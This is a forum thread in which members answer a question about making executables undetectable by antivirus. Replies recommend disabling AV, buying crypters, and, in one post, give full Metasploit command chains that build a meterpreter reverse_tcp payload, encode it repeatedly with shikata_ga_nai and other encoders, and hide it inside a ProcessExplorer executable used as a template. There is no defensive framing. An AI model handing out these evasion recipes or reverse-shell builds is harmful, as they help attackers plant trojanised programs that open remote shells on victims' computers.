Jump to content

[Question] Executable Obfuscation?


overwraith
 Share

Recommended Posts

Some of the problems with some of the tools though was that they were always picked up by antivirus. What I am asking is if there is a program that transforms the executables making them hard for the antivirus to discover.Obfuscation uses different tactics to make code hard to reverse engineer, and by extension hard to match to heuristics, and virus databases.

Edited by overwraith
Link to comment
Share on other sites

You could disable or uninstall their AV with the duck(maybe stop the services?). i don't know a whole lot about this but you could pack the files

too.

http://www.ehow.com/...es-windows.html

http://wiki.answers.com/Q/How_to_shut_down_avg_antivirus

It kinda really depends on which antivirus you wanna workaround

Edited by Goddish
Link to comment
Share on other sites

Everybody! The point in this is not to make an exception in the antivirus program, the point is to run the executables through a program that skews the code in such a way that it makes the code hard to recognize by antivirus. I was simply asking if anyone knew of any programs that do this. I know they exist. Virus writers use setups that can create thousands of different compilations of their code, all slightly different.

Link to comment
Share on other sites

They are called crypters and there are thousands of them, all the good ones cost money, they get patched daily by AVs and you have to pay for an updating subscription to a good not well know crypter. If you know someone who has one you can give them your stub and get them to crypt it for you.

Unless you know how to write a program to pack files yourself that's your best option.

Link to comment
Share on other sites

You will find that questions along these lines do not get answered, reason being that there are many ways to do this and it is relatively easy when you know what your doing. Il give you a hint, metasploit is capable of doing what your asking.

Edited by Sud0x3
Link to comment
Share on other sites

AVs do not detect metasploit code. If you're making binaries, they detect the stagers (the exes that carry the initial code) Try for yourself, lower your AV, run a meterpreter binary, make sure the shell is open, then restart your AV.

What do you see? The binary gets quarantined, but the meterpreter code itself runs in memory and isn't detected.

Using a custom EXE template is usually your best bet, or even better, a custom EXE with a lesser used payload (windows_add_user) or learn shellcode and write your own.

Link to comment
Share on other sites

I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example:


msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/coundown -c 5 -t exe payload.exe
[/CODE]

That sometimes still gets caught which is when I use a custom template which isn't too hard to do. Any windows executable can be used as a template. ProcessExplorer is an easy one to get your hands on and systinternals has a free download. All you need to do to run that is:

[CODE]
wget http://download.sysinternals.com/Files/ProcessExplorer.zip
unzip ProcessExplorer.zip
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe (This is the ProcessExplorer executable from zip) -o payload.exe -e x86/shikata_ga_nai -c 5
[/CODE]

As was mentioned in previous posts msfvenom is more updated than msfencode but when using a custom template (any windows executable) usually there is no problem at all bypassing AV.

Link to comment
Share on other sites

  • 2 weeks later...

The idea isn't to make a custom EXE, but to USE one. If you want to MAKE a custom EXE, fire up Notepad++ and your favourite compiler and get coding.

If you want to USE a custom EXE (ie not the default one bundled with metasploit), then you can use the '-x' option with 'msfvenom'.. There are other ways, but I find that to be the easiest.

Just remember to spawn a listener in metasploit if you need one!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...